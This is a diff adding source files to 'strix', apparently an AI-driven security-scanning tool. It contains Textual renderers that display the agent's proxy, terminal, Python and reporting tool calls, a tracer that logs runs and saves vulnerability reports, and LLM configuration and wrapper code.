                        response = req.get("response") or {}
                        status = response.get("statusCode", "?")
                        line = f"{method} {path} → {status}"
                        request_lines.append(line)
                if len(requests) > 3:
                    request_lines.append(f"... +{len(requests) - 3} more")
                escaped_lines = [cls.escape_markup(line) for line in request_lines]
                content_text = f"{header}\n  [dim]{chr(10).join(escaped_lines)}[/]"
            else:
                content_text = f"{header}\n  [dim]No requests found[/]"
        elif httpql_filter:
            filter_display = (
                httpql_filter[:300] + "..." if len(httpql_filter) > 300 else httpql_filter
            )
            content_text = f"{header}\n  [dim]{cls.escape_markup(filter_display)}[/]"
        else:
            content_text = f"{header}\n  [dim]All requests[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
@register_tool_renderer
 class ViewRequestRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "view_request"
    css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        result = tool_data.get("result")
        part = args.get("part", "request")
        header = f"👀 [bold #06b6d4]Viewing {part}[/]"
        if result and isinstance(result, dict):
            if "content" in result:
                content = result["content"]
                content_preview = content[:500] + "..." if len(content) > 500 else content
                content_text = f"{header}\n  [dim]{cls.escape_markup(content_preview)}[/]"
            elif "matches" in result:
                matches = result["matches"]
                if isinstance(matches, list) and matches:
                    match_lines = [
                        match["match"]
                        for match in matches[:3]
                        if isinstance(match, dict) and "match" in match
                    ]
                    if len(matches) > 3:
                        match_lines.append(f"... +{len(matches) - 3} more matches")
                    escaped_lines = [cls.escape_markup(line) for line in match_lines]
                    content_text = f"{header}\n  [dim]{chr(10).join(escaped_lines)}[/]"
                else:
                    content_text = f"{header}\n  [dim]No matches found[/]"
            else:
                content_text = f"{header}\n  [dim]Viewing content...[/]"
        else:
            content_text = f"{header}\n  [dim]Loading...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
@register_tool_renderer
 class SendRequestRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "send_request"
    css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        result = tool_data.get("result")
        method = args.get("method", "GET")
        url = args.get("url", "")
        header = f"📤 [bold #06b6d4]Sending {method}[/]"
        if result and isinstance(result, dict):
            status_code = result.get("status_code")
            response_body = result.get("body", "")
            if status_code:
                response_preview = f"Status: {status_code}"
                if response_body:
                    body_preview = (
                        response_body[:300] + "..." if len(response_body) > 300 else response_body
                    )
                    response_preview += f"\n{body_preview}"
                content_text = f"{header}\n  [dim]{cls.escape_markup(response_preview)}[/]"
            else:
                content_text = f"{header}\n  [dim]Response received[/]"
        elif url:
            url_display = url[:400] + "..." if len(url) > 400 else url
            content_text = f"{header}\n  [dim]{cls.escape_markup(url_display)}[/]"
        else:
            content_text = f"{header}\n  [dim]Sending...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
@register_tool_renderer
 class RepeatRequestRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "repeat_request"
    css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        result = tool_data.get("result")
        modifications = args.get("modifications", {})
        header = "🔄 [bold #06b6d4]Repeating request[/]"
        if result and isinstance(result, dict):
            status_code = result.get("status_code")
            response_body = result.get("body", "")
            if status_code:
                response_preview = f"Status: {status_code}"
                if response_body:
                    body_preview = (
                        response_body[:300] + "..." if len(response_body) > 300 else response_body
                    )
                    response_preview += f"\n{body_preview}"
                content_text = f"{header}\n  [dim]{cls.escape_markup(response_preview)}[/]"
            else:
                content_text = f"{header}\n  [dim]Response received[/]"
        elif modifications:
            mod_text = str(modifications)
            mod_display = mod_text[:400] + "..." if len(mod_text) > 400 else mod_text
            content_text = f"{header}\n  [dim]{cls.escape_markup(mod_display)}[/]"
        else:
            content_text = f"{header}\n  [dim]No modifications[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
@register_tool_renderer
 class ScopeRulesRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "scope_rules"
    css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:  # noqa: ARG003
        header = "⚙️ [bold #06b6d4]Updating proxy scope[/]"
        content_text = f"{header}\n  [dim]Configuring...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
@register_tool_renderer
 class ListSitemapRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "list_sitemap"
    css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        result = tool_data.get("result")
        header = "🗺️ [bold #06b6d4]Listing sitemap[/]"
        if result and isinstance(result, dict) and "entries" in result:
            entries = result["entries"]
            if isinstance(entries, list) and entries:
                entry_lines = []
                for entry in entries[:4]:
                    if isinstance(entry, dict):
                        label = entry.get("label", "?")
                        kind = entry.get("kind", "?")
                        line = f"{kind}: {label}"
                        entry_lines.append(line)
                if len(entries) > 4:
                    entry_lines.append(f"... +{len(entries) - 4} more")
                escaped_lines = [cls.escape_markup(line) for line in entry_lines]
                content_text = f"{header}\n  [dim]{chr(10).join(escaped_lines)}[/]"
            else:
                content_text = f"{header}\n  [dim]No entries found[/]"
        else:
            content_text = f"{header}\n  [dim]Loading...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
@register_tool_renderer
 class ViewSitemapEntryRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "view_sitemap_entry"
    css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        result = tool_data.get("result")
        header = "📍 [bold #06b6d4]Viewing sitemap entry[/]"
        if result and isinstance(result, dict):
            if "entry" in result:
                entry = result["entry"]
                if isinstance(entry, dict):
                    label = entry.get("label", "")
                    kind = entry.get("kind", "")
                    if label and kind:
                        entry_info = f"{kind}: {label}"
                        content_text = f"{header}\n  [dim]{cls.escape_markup(entry_info)}[/]"
                    else:
                        content_text = f"{header}\n  [dim]Entry details loaded[/]"
                else:
                    content_text = f"{header}\n  [dim]Entry details loaded[/]"
            else:
                content_text = f"{header}\n  [dim]Loading entry...[/]"
        else:
            content_text = f"{header}\n  [dim]Loading...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
--- a/strix/cli/tool_components/python_renderer.py
+++ b/strix/cli/tool_components/python_renderer.py
@@ -0,0 +1,34 @@
 from typing import Any, ClassVar
 from textual.widgets import Static
 from .base_renderer import BaseToolRenderer
 from .registry import register_tool_renderer
@register_tool_renderer
 class PythonRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "python_action"
    css_classes: ClassVar[list[str]] = ["tool-call", "python-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        action = args.get("action", "")
        code = args.get("code", "")
        header = "</> [bold #3b82f6]Python[/]"
        if code and action in ["new_session", "execute"]:
            code_display = code[:250] + "..." if len(code) > 250 else code
            content_text = f"{header}\n  [italic white]{cls.escape_markup(code_display)}[/]"
        elif action == "close":
            content_text = f"{header}\n  [dim]Closing session...[/]"
        elif action == "list_sessions":
            content_text = f"{header}\n  [dim]Listing sessions...[/]"
        else:
            content_text = f"{header}\n  [dim]Running...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
--- a/strix/cli/tool_components/registry.py
+++ b/strix/cli/tool_components/registry.py
@@ -0,0 +1,72 @@
 from typing import Any, ClassVar
 from textual.widgets import Static
 from .base_renderer import BaseToolRenderer
 class ToolTUIRegistry:
    _renderers: ClassVar[dict[str, type[BaseToolRenderer]]] = {}
    @classmethod
    def register(cls, renderer_class: type[BaseToolRenderer]) -> None:
        if not renderer_class.tool_name:
            raise ValueError(f"Renderer {renderer_class.__name__} must define tool_name")
        cls._renderers[renderer_class.tool_name] = renderer_class
    @classmethod
    def get_renderer(cls, tool_name: str) -> type[BaseToolRenderer] | None:
        return cls._renderers.get(tool_name)
    @classmethod
    def list_tools(cls) -> list[str]:
        return list(cls._renderers.keys())
    @classmethod
    def has_renderer(cls, tool_name: str) -> bool:
        return tool_name in cls._renderers
 def register_tool_renderer(renderer_class: type[BaseToolRenderer]) -> type[BaseToolRenderer]:
    ToolTUIRegistry.register(renderer_class)
    return renderer_class
 def get_tool_renderer(tool_name: str) -> type[BaseToolRenderer] | None:
    return ToolTUIRegistry.get_renderer(tool_name)
 def render_tool_widget(tool_data: dict[str, Any]) -> Static:
    tool_name = tool_data.get("tool_name", "")
    renderer = get_tool_renderer(tool_name)
    if renderer:
        return renderer.render(tool_data)
    return _render_default_tool_widget(tool_data)
 def _render_default_tool_widget(tool_data: dict[str, Any]) -> Static:
    tool_name = BaseToolRenderer.escape_markup(tool_data.get("tool_name", "Unknown Tool"))
    args = tool_data.get("args", {})
    status = tool_data.get("status", "unknown")
    result = tool_data.get("result")
    status_text = BaseToolRenderer.get_status_icon(status)
    header = f"→ Using tool [bold blue]{tool_name}[/]"
    content_parts = [header]
    args_str = BaseToolRenderer.format_args(args)
    if args_str:
        content_parts.append(args_str)
    if status in ["completed", "failed", "error"] and result is not None:
        result_str = BaseToolRenderer.format_result(result)
        if result_str:
            content_parts.append(f"[bold]Result:[/] {result_str}")
    else:
        content_parts.append(status_text)
    css_classes = BaseToolRenderer.get_css_classes(status)
    return Static("\n".join(content_parts), classes=css_classes)
--- a/strix/cli/tool_components/reporting_renderer.py
+++ b/strix/cli/tool_components/reporting_renderer.py
@@ -0,0 +1,53 @@
 from typing import Any, ClassVar
 from textual.widgets import Static
 from .base_renderer import BaseToolRenderer
 from .registry import register_tool_renderer
@register_tool_renderer
 class CreateVulnerabilityReportRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "create_vulnerability_report"
    css_classes: ClassVar[list[str]] = ["tool-call", "reporting-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        title = args.get("title", "")
        severity = args.get("severity", "")
        content = args.get("content", "")
        header = "🐞 [bold #ea580c]Vulnerability Report[/]"
        if title:
            content_parts = [f"{header}\n  [bold]{cls.escape_markup(title)}[/]"]
            if severity:
                severity_color = cls._get_severity_color(severity.lower())
                content_parts.append(
                    f"  [dim]Severity: [{severity_color}]{severity.upper()}[/{severity_color}][/]"
                )
            if content:
                content_preview = content[:100] + "..." if len(content) > 100 else content
                content_parts.append(f"  [dim]{cls.escape_markup(content_preview)}[/]")
            content_text = "\n".join(content_parts)
        else:
            content_text = f"{header}\n  [dim]Creating report...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
    @classmethod
    def _get_severity_color(cls, severity: str) -> str:
        severity_colors = {
            "critical": "#dc2626",
            "high": "#ea580c",
            "medium": "#d97706",
            "low": "#65a30d",
            "info": "#0284c7",
        }
        return severity_colors.get(severity, "#6b7280")
--- a/strix/cli/tool_components/scan_info_renderer.py
+++ b/strix/cli/tool_components/scan_info_renderer.py
@@ -0,0 +1,58 @@
 from typing import Any, ClassVar
 from textual.widgets import Static
 from .base_renderer import BaseToolRenderer
 from .registry import register_tool_renderer
@register_tool_renderer
 class ScanStartInfoRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "scan_start_info"
    css_classes: ClassVar[list[str]] = ["tool-call", "scan-info-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        status = tool_data.get("status", "unknown")
        target = args.get("target", {})
        target_display = cls._build_target_display(target)
        content = f"🚀 Starting scan on {target_display}"
        css_classes = cls.get_css_classes(status)
        return Static(content, classes=css_classes)
    @classmethod
    def _build_target_display(cls, target: dict[str, Any]) -> str:
        if target_url := target.get("target_url"):
            return f"[bold #22c55e]{target_url}[/bold #22c55e]"
        if target_repo := target.get("target_repo"):
            return f"[bold #22c55e]{target_repo}[/bold #22c55e]"
        if target_path := target.get("target_path"):
            return f"[bold #22c55e]{target_path}[/bold #22c55e]"
        return "[dim]unknown target[/dim]"
@register_tool_renderer
 class SubagentStartInfoRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "subagent_start_info"
    css_classes: ClassVar[list[str]] = ["tool-call", "subagent-info-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        status = tool_data.get("status", "unknown")
        name = args.get("name", "Unknown Agent")
        task = args.get("task", "")
        content = f"🤖 Spawned subagent [bold #22c55e]{name}[/bold #22c55e]"
        if task:
            display_task = task[:80] + "..." if len(task) > 80 else task
            content += f"\n    Task: [dim]{display_task}[/dim]"
        css_classes = cls.get_css_classes(status)
        return Static(content, classes=css_classes)
--- a/strix/cli/tool_components/terminal_renderer.py
+++ b/strix/cli/tool_components/terminal_renderer.py
@@ -0,0 +1,99 @@
 from typing import Any, ClassVar
 from textual.widgets import Static
 from .base_renderer import BaseToolRenderer
 from .registry import register_tool_renderer
@register_tool_renderer
 class TerminalRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "terminal_action"
    css_classes: ClassVar[list[str]] = ["tool-call", "terminal-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        status = tool_data.get("status", "unknown")
        result = tool_data.get("result", {})
        action = args.get("action", "unknown")
        inputs = args.get("inputs", [])
        terminal_id = args.get("terminal_id", "default")
        content = cls._build_sleek_content(action, inputs, terminal_id, result)
        css_classes = cls.get_css_classes(status)
        return Static(content, classes=css_classes)
    @classmethod
    def _build_sleek_content(
        cls,
        action: str,
        inputs: list[str],
        terminal_id: str,  # noqa: ARG003
        result: dict[str, Any],  # noqa: ARG003
    ) -> str:
        terminal_icon = ">_"
        if action in {"create", "new_terminal"}:
            command = cls._format_command(inputs) if inputs else "bash"
            return f"{terminal_icon} [#22c55e]${command}[/]"
        if action == "send_input":
            command = cls._format_command(inputs)
            return f"{terminal_icon} [#22c55e]${command}[/]"
        if action == "wait":
            return f"{terminal_icon} [dim]waiting...[/]"
        if action == "close":
            return f"{terminal_icon} [dim]close[/]"
        if action == "get_snapshot":
            return f"{terminal_icon} [dim]snapshot[/]"
        return f"{terminal_icon} [dim]{action}[/]"
    @classmethod
    def _format_command(cls, inputs: list[str]) -> str:
        if not inputs:
            return ""
        command_parts = []
        for input_item in inputs:
            if input_item == "Enter":
                break
            if input_item.startswith("literal:"):
                command_parts.append(input_item[8:])
            elif input_item in [
                "Space",
                "Tab",
                "Backspace",
                "Up",
                "Down",
                "Left",
                "Right",
                "Home",
                "End",
                "PageUp",
                "PageDown",
                "Insert",
                "Delete",
                "Escape",
            ] or input_item.startswith(("^", "C-", "S-", "A-", "F")):
                if input_item == "Space":
                    command_parts.append(" ")
                elif input_item == "Tab":
                    command_parts.append("\t")
                continue
            else:
                command_parts.append(input_item)
        command = "".join(command_parts).strip()
        if len(command) > 200:
            command = command[:197] + "..."
        return cls.escape_markup(command) if command else "bash"
--- a/strix/cli/tool_components/thinking_renderer.py
+++ b/strix/cli/tool_components/thinking_renderer.py
@@ -0,0 +1,29 @@
 from typing import Any, ClassVar
 from textual.widgets import Static
 from .base_renderer import BaseToolRenderer
 from .registry import register_tool_renderer
@register_tool_renderer
 class ThinkRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "think"
    css_classes: ClassVar[list[str]] = ["tool-call", "thinking-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        thought = args.get("thought", "")
        header = "🧠 [bold #a855f7]Thinking[/]"
        if thought:
            thought_display = thought[:200] + "..." if len(thought) > 200 else thought
            content = f"{header}\n  [italic dim]{cls.escape_markup(thought_display)}[/]"
        else:
            content = f"{header}\n  [italic dim]Thinking...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content, classes=css_classes)
--- a/strix/cli/tool_components/user_message_renderer.py
+++ b/strix/cli/tool_components/user_message_renderer.py
@@ -0,0 +1,43 @@
 from typing import Any, ClassVar
 from textual.widgets import Static
 from .base_renderer import BaseToolRenderer
 from .registry import register_tool_renderer
@register_tool_renderer
 class UserMessageRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "user_message"
    css_classes: ClassVar[list[str]] = ["chat-message", "user-message"]
    @classmethod
    def render(cls, message_data: dict[str, Any]) -> Static:
        content = message_data.get("content", "")
        if not content:
            return Static("", classes=cls.css_classes)
        if len(content) > 300:
            content = content[:297] + "..."
        lines = content.split("\n")
        bordered_lines = [f"[#3b82f6]▍[/#3b82f6] {line}" for line in lines]
        bordered_content = "\n".join(bordered_lines)
        formatted_content = f"[#3b82f6]▍[/#3b82f6] [bold]You:[/]\n{bordered_content}"
        css_classes = " ".join(cls.css_classes)
        return Static(formatted_content, classes=css_classes)
    @classmethod
    def render_simple(cls, content: str) -> str:
        if not content:
            return ""
        if len(content) > 300:
            content = content[:297] + "..."
        lines = content.split("\n")
        bordered_lines = [f"[#3b82f6]▍[/#3b82f6] {line}" for line in lines]
        bordered_content = "\n".join(bordered_lines)
        return f"[#3b82f6]▍[/#3b82f6] [bold]You:[/]\n{bordered_content}"
--- a/strix/cli/tool_components/web_search_renderer.py
+++ b/strix/cli/tool_components/web_search_renderer.py
@@ -0,0 +1,28 @@
 from typing import Any, ClassVar
 from textual.widgets import Static
 from .base_renderer import BaseToolRenderer
 from .registry import register_tool_renderer
@register_tool_renderer
 class WebSearchRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "web_search"
    css_classes: ClassVar[list[str]] = ["tool-call", "web-search-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        query = args.get("query", "")
        header = "🌐 [bold #60a5fa]Searching the web...[/]"
        if query:
            query_display = query[:100] + "..." if len(query) > 100 else query
            content_text = f"{header}\n  [dim]{cls.escape_markup(query_display)}[/]"
        else:
            content_text = f"{header}"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
--- a/strix/cli/tracer.py
+++ b/strix/cli/tracer.py
@@ -0,0 +1,308 @@
 import logging
 from datetime import UTC, datetime
 from pathlib import Path
 from typing import Any, Optional
 from uuid import uuid4
 logger = logging.getLogger(__name__)
 _global_tracer: Optional["Tracer"] = None
 def get_global_tracer() -> Optional["Tracer"]:
    return _global_tracer
 def set_global_tracer(tracer: "Tracer") -> None:
    global _global_tracer  # noqa: PLW0603
    _global_tracer = tracer
 class Tracer:
    def __init__(self, run_name: str | None = None):
        self.run_name = run_name
        self.run_id = run_name or f"run-{uuid4().hex[:8]}"
        self.start_time = datetime.now(UTC).isoformat()
        self.end_time: str | None = None
        self.agents: dict[str, dict[str, Any]] = {}
        self.tool_executions: dict[int, dict[str, Any]] = {}
        self.chat_messages: list[dict[str, Any]] = []
        self.vulnerability_reports: list[dict[str, Any]] = []
        self.final_scan_result: str | None = None
        self.scan_results: dict[str, Any] | None = None
        self.scan_config: dict[str, Any] | None = None
        self.run_metadata: dict[str, Any] = {
            "run_id": self.run_id,
            "run_name": self.run_name,
            "start_time": self.start_time,
            "end_time": None,
            "target": None,
            "scan_type": None,
            "status": "running",
        }
        self._run_dir: Path | None = None
        self._next_execution_id = 1
        self._next_message_id = 1
    def set_run_name(self, run_name: str) -> None:
        self.run_name = run_name
        self.run_id = run_name
    def get_run_dir(self) -> Path:
        if self._run_dir is None:
            workspace_root = Path(__file__).parent.parent.parent
            runs_dir = workspace_root / "agent_runs"
            runs_dir.mkdir(exist_ok=True)
            run_dir_name = self.run_name if self.run_name else self.run_id
            self._run_dir = runs_dir / run_dir_name
            self._run_dir.mkdir(exist_ok=True)
        return self._run_dir
    def add_vulnerability_report(
        self,
        title: str,
        content: str,
        severity: str,
    ) -> str:
        report_id = f"vuln-{len(self.vulnerability_reports) + 1:04d}"
        report = {
            "id": report_id,
            "title": title.strip(),
            "content": content.strip(),
            "severity": severity.lower().strip(),
            "timestamp": datetime.now(UTC).strftime("%Y-%m-%d %H:%M:%S UTC"),
        }
        self.vulnerability_reports.append(report)
        logger.info(f"Added vulnerability report: {report_id} - {title}")
        return report_id
    def set_final_scan_result(
        self,
        content: str,
        success: bool = True,
    ) -> None:
        self.final_scan_result = content.strip()
        self.scan_results = {
            "scan_completed": True,
            "content": content,
            "success": success,
        }
        logger.info(f"Set final scan result: success={success}")
    def log_agent_creation(
        self, agent_id: str, name: str, task: str, parent_id: str | None = None
    ) -> None:
        agent_data: dict[str, Any] = {
            "id": agent_id,
            "name": name,
            "task": task,
            "status": "running",
            "parent_id": parent_id,
            "created_at": datetime.now(UTC).isoformat(),
            "updated_at": datetime.now(UTC).isoformat(),
            "tool_executions": [],
        }
        self.agents[agent_id] = agent_data
    def log_chat_message(
        self,
        content: str,
        role: str,
        agent_id: str | None = None,
        metadata: dict[str, Any] | None = None,
    ) -> int:
        message_id = self._next_message_id
        self._next_message_id += 1
        message_data = {
            "message_id": message_id,
            "content": content,
            "role": role,
            "agent_id": agent_id,
            "timestamp": datetime.now(UTC).isoformat(),
            "metadata": metadata or {},
        }
        self.chat_messages.append(message_data)
        return message_id
    def log_tool_execution_start(self, agent_id: str, tool_name: str, args: dict[str, Any]) -> int:
        execution_id = self._next_execution_id
        self._next_execution_id += 1
        now = datetime.now(UTC).isoformat()
        execution_data = {
            "execution_id": execution_id,
            "agent_id": agent_id,
            "tool_name": tool_name,
            "args": args,
            "status": "running",
            "result": None,
            "timestamp": now,
            "started_at": now,
            "completed_at": None,
        }
        self.tool_executions[execution_id] = execution_data
        if agent_id in self.agents:
            self.agents[agent_id]["tool_executions"].append(execution_id)
        return execution_id
    def update_tool_execution(
        self, execution_id: int, status: str, result: Any | None = None
    ) -> None:
        if execution_id in self.tool_executions:
            self.tool_executions[execution_id]["status"] = status
            self.tool_executions[execution_id]["result"] = result
            self.tool_executions[execution_id]["completed_at"] = datetime.now(UTC).isoformat()
    def update_agent_status(self, agent_id: str, status: str) -> None:
        if agent_id in self.agents:
            self.agents[agent_id]["status"] = status
            self.agents[agent_id]["updated_at"] = datetime.now(UTC).isoformat()
    def set_scan_config(self, config: dict[str, Any]) -> None:
        self.scan_config = config
        self.run_metadata.update(
            {
                "target": config.get("target", {}),
                "scan_type": config.get("scan_type", "general"),
                "user_instructions": config.get("user_instructions", ""),
                "max_iterations": config.get("max_iterations", 200),
            }
        )
    def save_run_data(self) -> None:
        try:
            run_dir = self.get_run_dir()
            self.end_time = datetime.now(UTC).isoformat()
            if self.final_scan_result:
                scan_report_file = run_dir / "scan_report.md"
                with scan_report_file.open("w", encoding="utf-8") as f:
                    f.write("# Security Scan Report\n\n")
                    f.write(
                        f"**Generated:** {datetime.now(UTC).strftime('%Y-%m-%d %H:%M:%S UTC')}\n\n"
                    )
                    f.write(f"{self.final_scan_result}\n")
                logger.info(f"Saved final scan report to: {scan_report_file}")
            if self.vulnerability_reports:
                vuln_dir = run_dir / "vulnerabilities"
                vuln_dir.mkdir(exist_ok=True)
                severity_order = {"critical": 0, "high": 1, "medium": 2, "low": 3, "info": 4}
                sorted_reports = sorted(
                    self.vulnerability_reports,
                    key=lambda x: (severity_order.get(x["severity"], 5), x["timestamp"]),
                )
                for report in sorted_reports:
                    vuln_file = vuln_dir / f"{report['id']}.md"
                    with vuln_file.open("w", encoding="utf-8") as f:
                        f.write(f"# {report['title']}\n\n")
                        f.write(f"**ID:** {report['id']}\n")
                        f.write(f"**Severity:** {report['severity'].upper()}\n")
                        f.write(f"**Found:** {report['timestamp']}\n\n")
                        f.write("## Description\n\n")
                        f.write(f"{report['content']}\n")
                vuln_csv_file = run_dir / "vulnerabilities.csv"
                with vuln_csv_file.open("w", encoding="utf-8", newline="") as f:
                    import csv
                    fieldnames = ["id", "title", "severity", "timestamp", "file"]
                    writer = csv.DictWriter(f, fieldnames=fieldnames)
                    writer.writeheader()
                    for report in sorted_reports:
                        writer.writerow(
                            {
                                "id": report["id"],
                                "title": report["title"],
                                "severity": report["severity"].upper(),
                                "timestamp": report["timestamp"],
                                "file": f"vulnerabilities/{report['id']}.md",
                            }
                        )
                logger.info(
                    f"Saved {len(self.vulnerability_reports)} vulnerability reports to: {vuln_dir}"
                )
                logger.info(f"Saved vulnerability index to: {vuln_csv_file}")
            logger.info(f"📊 Essential scan data saved to: {run_dir}")
        except (OSError, RuntimeError):
            logger.exception("Failed to save scan data")
    def _calculate_duration(self) -> float:
        try:
            start = datetime.fromisoformat(self.start_time.replace("Z", "+00:00"))
            if self.end_time:
                end = datetime.fromisoformat(self.end_time.replace("Z", "+00:00"))
                return (end - start).total_seconds()
        except (ValueError, TypeError):
            pass
        return 0.0
    def get_agent_tools(self, agent_id: str) -> list[dict[str, Any]]:
        return [
            exec_data
            for exec_data in self.tool_executions.values()
            if exec_data.get("agent_id") == agent_id
        ]
    def get_real_tool_count(self) -> int:
        return sum(
            1
            for exec_data in self.tool_executions.values()
            if exec_data.get("tool_name") not in ["scan_start_info", "subagent_start_info"]
        )
    def get_total_llm_stats(self) -> dict[str, Any]:
        from strix.tools.agents_graph.agents_graph_actions import _agent_instances
        total_stats = {
            "input_tokens": 0,
            "output_tokens": 0,
            "cached_tokens": 0,
            "cache_creation_tokens": 0,
            "cost": 0.0,
            "requests": 0,
            "failed_requests": 0,
        }
        for agent_instance in _agent_instances.values():
            if hasattr(agent_instance, "llm") and hasattr(agent_instance.llm, "_total_stats"):
                agent_stats = agent_instance.llm._total_stats
                total_stats["input_tokens"] += agent_stats.input_tokens
                total_stats["output_tokens"] += agent_stats.output_tokens
                total_stats["cached_tokens"] += agent_stats.cached_tokens
                total_stats["cache_creation_tokens"] += agent_stats.cache_creation_tokens
                total_stats["cost"] += agent_stats.cost
                total_stats["requests"] += agent_stats.requests
                total_stats["failed_requests"] += agent_stats.failed_requests
        total_stats["cost"] = round(total_stats["cost"], 4)
        return {
            "total": total_stats,
            "total_tokens": total_stats["input_tokens"] + total_stats["output_tokens"],
        }
    def cleanup(self) -> None:
        self.save_run_data()
--- a/strix/llm/init.py
+++ b/strix/llm/init.py
@@ -0,0 +1,12 @@
 import litellm
 from .config import LLMConfig
 from .llm import LLM
 __all__ = [
    "LLM",
    "LLMConfig",
 ]
 litellm.drop_params = True
--- a/strix/llm/config.py
+++ b/strix/llm/config.py
@@ -0,0 +1,19 @@
 import os
 class LLMConfig:
    def __init__(
        self,
        model_name: str | None = None,
        temperature: float = 0,
        enable_prompt_caching: bool = True,
        prompt_modules: list[str] | None = None,
    ):
        self.model_name = model_name or os.getenv("STRIX_LLM", "anthropic/claude-sonnet-4-20250514")
        if not self.model_name:
            raise ValueError("STRIX_LLM environment variable must be set and not empty")
        self.temperature = max(0.0, min(1.0, temperature))
        self.enable_prompt_caching = enable_prompt_caching
        self.prompt_modules = prompt_modules or []
--- a/strix/llm/llm.py
+++ b/strix/llm/llm.py
@@ -0,0 +1,310 @@
 import logging
 import os
 from dataclasses import dataclass
 from enum import Enum
 from pathlib import Path
 from typing import Any
 import litellm
 from jinja2 import (
    Environment,
    FileSystemLoader,
    select_autoescape,
 )
 from litellm import ModelResponse, completion_cost
 from litellm.utils import supports_prompt_caching
 from strix.llm.config import LLMConfig
 from strix.llm.memory_compressor import MemoryCompressor
 from strix.llm.request_queue import get_global_queue
 from strix.llm.utils import _truncate_to_first_function, parse_tool_invocations
 from strix.prompts import load_prompt_modules
 from strix.tools import get_tools_prompt
 logger = logging.getLogger(__name__)
 api_key = os.getenv("LLM_API_KEY")
 if api_key:
    litellm.api_key = api_key
 class StepRole(str, Enum):
    AGENT = "agent"
    USER = "user"
    SYSTEM = "system"
@dataclass
 class LLMResponse:
    content: str
    tool_invocations: list[dict[str, Any]] | None = None
    scan_id: str | None = None
    step_number: int = 1
    role: StepRole = StepRole.AGENT
@dataclass
 class RequestStats:
    input_tokens: int = 0
    output_tokens: int = 0
    cached_tokens: int = 0
    cache_creation_tokens: int = 0
    cost: float = 0.0
    requests: int = 0
    failed_requests: int = 0
    def to_dict(self) -> dict[str, int | float]:
        return {
            "input_tokens": self.input_tokens,
            "output_tokens": self.output_tokens,
            "cached_tokens": self.cached_tokens,
            "cache_creation_tokens": self.cache_creation_tokens,
            "cost": round(self.cost, 4),
            "requests": self.requests,
            "failed_requests": self.failed_requests,
        }
 class LLM:
    def __init__(self, config: LLMConfig, agent_name: str | None = None):
        self.config = config
        self.agent_name = agent_name
        self._total_stats = RequestStats()
        self._last_request_stats = RequestStats()
        self.memory_compressor = MemoryCompressor()
        if agent_name:
            prompt_dir = Path(__file__).parent.parent / "agents" / agent_name
            prompts_dir = Path(__file__).parent.parent / "prompts"
            loader = FileSystemLoader([prompt_dir, prompts_dir])
            self.jinja_env = Environment(
                loader=loader,
                autoescape=select_autoescape(enabled_extensions=(), default_for_string=False),
            )
            try:
                prompt_module_content = load_prompt_modules(
                    self.config.prompt_modules or [], self.jinja_env
                )
                def get_module(name: str) -> str:
                    return prompt_module_content.get(name, "")
                self.jinja_env.globals["get_module"] = get_module
                self.system_prompt = self.jinja_env.get_template("system_prompt.jinja").render(
                    get_tools_prompt=get_tools_prompt,
                    loaded_module_names=list(prompt_module_content.keys()),
                    **prompt_module_content,
                )
            except (FileNotFoundError, OSError, ValueError) as e:
                logger.warning(f"Failed to load system prompt for {agent_name}: {e}")
                self.system_prompt = "You are a helpful AI assistant."
        else:
            self.system_prompt = "You are a helpful AI assistant."
    def _add_cache_control_to_content(
        self, content: str | list[dict[str, Any]]
